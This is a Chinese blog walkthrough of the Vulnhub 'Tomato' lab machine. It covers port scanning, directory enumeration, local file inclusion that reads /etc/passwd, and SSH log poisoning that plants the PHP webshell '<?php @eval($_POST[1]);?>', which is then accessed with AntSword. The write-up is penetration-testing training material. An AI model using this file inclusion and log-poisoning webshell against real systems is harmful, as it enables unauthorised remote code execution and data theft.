靶机3(tomato)

最新推荐文章于 2024-09-06 16:06:10 发布
最新推荐文章于 2024-09-06 16:06:10 发布
阅读量477 收藏 3
点赞数 9
分类专栏: 文件 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lhdbk______/article/details/140781427
版权
1.确定IP(虚拟机为NAT模式)

使用御剑端口扫描

2.nmap扫描端口

nmap -A 192.168.238.133 -p-

扫描出来2211,是ssh的连接端口

3.使用dirb进行目录扫描

dirb http://192.168.238.133

4.访问antibot_image目录

查看页面源代码,发现存在文件包含漏洞

5.漏洞利用

在URL后面输入 ?image=/etc/passwd (用image参数传入想要获取的文件路径)

http://192.168.238.133/antibot_image/antibots/info.php?image=/etc/passwd

6.报错连接2211

ssh '<?php @eval($_POST[1]);?>'@192.168.238.133 -p 2211

在网页端查看ubuntu报错信息:/var/log/auth.log

/var/log/auth.log 记录了所有和用户认证相关的日志 。

7.蚁剑连接

lhdbk______
关注
  • 9
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub篇Tomato.zip
01-12
主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。
Metasploitable3靶机
05-09
Metasploitable3是一个win2008的靶机---Metasploitable 3简介 Metasploitable 3 内置一些安全机制,比如防火墙,权限设置等。此外,Metasploitable 3中有些漏洞在 Metasploit 中并没有漏洞利用模块,需要手工挖掘。...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
39772.zip靶机所用文件66
08-11
【标签】"dc3靶机所用文件"进一步确认了这个压缩包的内容与DC3靶机训练有关,文件可能是为了设置、维护或挑战靶机环境而设计的。这些文件可能包括配置脚本、漏洞利用代码、安全工具、日志文件、证书、数据库文件以及...
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-06 1583
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
什么是网络安全
网络研究观
09-04 2602
了解不同类型的网络安全和主要形式的网络威胁。
【网络安全】漏洞挖掘
anquan2233的博客
08-29 1697
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-04 1453
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全知识:什么是访问控制列表 (ACL)?
2401_84434570的博客
09-04 1014
使用 ACL 的操作系统包括 Microsoft Windows NT/2000、Novell 的 Netware、Digital 的 OpenVMS 和基于 UNIX 的系统。通常,标准 ACL 实施在靠近其要保护的目的地的位置,而扩展 ACL 则放置在靠近源的位置。ACL 有多种形式,每种形式都适用于不同的场景,并提供不同级别的控制和复杂性。每个对象都与一个安全属性相关联,该属性将其链接到其 ACL,其中包含每个具有该对象访问权限的用户的条目。将最常触发的规则置于 ACL 的顶部以优化性能。
2024年“羊城杯”粤港澳大湾区网络安全大赛 初赛 Web&数据安全&AI 题解WriteUp
Jay17的博客
09-04 1190
2024年“羊城杯”粤港澳大湾区网络安全大赛 初赛 Web&数据安全&AI 题解WriteUp
2024年入职/转行网络安全,该如何规划?_网络安全职业规划
2401_85023531的博客
09-03 1155
前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,其中,信息安全位列第一。
网络安全应急响应技术原理与应用
最新发布
weixin_49171105的博客
09-06 329
概念为应对网络安全事件,相关人员或组织机构对网络安全事件进行监测、预警、分析、响应和恢复等工作。
【网络安全】IIS未授权访问敏感数据
等风来
09-04 165
可以访问用户信息、服务状态、系统目录,在某些版本下可以实现RCE。
人工智能在网络安全中是如何实现对未知威胁和零日攻击的识别的?
gmqqcsdn的博客
09-03 348
通过机器学习和深度学习算法,人工智能可以对大量的网络数据进行分析和学习,从而快速识别出异常活动和潜在的威胁。这种基于数据驱动的方法不完全依赖于预先定义的规则或签名,因此能够在一定程度上应对未知的攻击手段,如零日攻击。随着近些年来技术水平以及硬件的不断发展提升,越来越多的人工智能大模型正以惊人的速度发展进而改变着我们的生活和工作方式。在实际应用中,人工智能技术已经被集成到入侵检测系统、恶意软件分析和网络流量监控等多个网络安全领域,显著提高了对未知威胁和零日攻击的识别率和响应速度。
【网络安全】Self XSS + 文件上传CSRF
等风来
09-03 442
利用Burp Suite对请求进行了深入分析,发现文件上传操作会通过 `filename` 变量来传递上传文件的名称。我尝试在文件名中输入随机文本,试图找到反射点,但最初并没有任何效果。后来,我修改了文件的扩展名为“helloworld.fakeext”,成功触发了一个错误消息
metasploitable3靶机安装
03-16
Metasploitable3 是一个用于渗透测试的虚拟机镜像,它包含了许多常见漏洞,可用于练习渗透测试技能。安装过程如下: 1. 下载 Metasploitable3 镜像文件 2. 使用虚拟机软件(如 VirtualBox)导入镜像文件 3. 启动...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值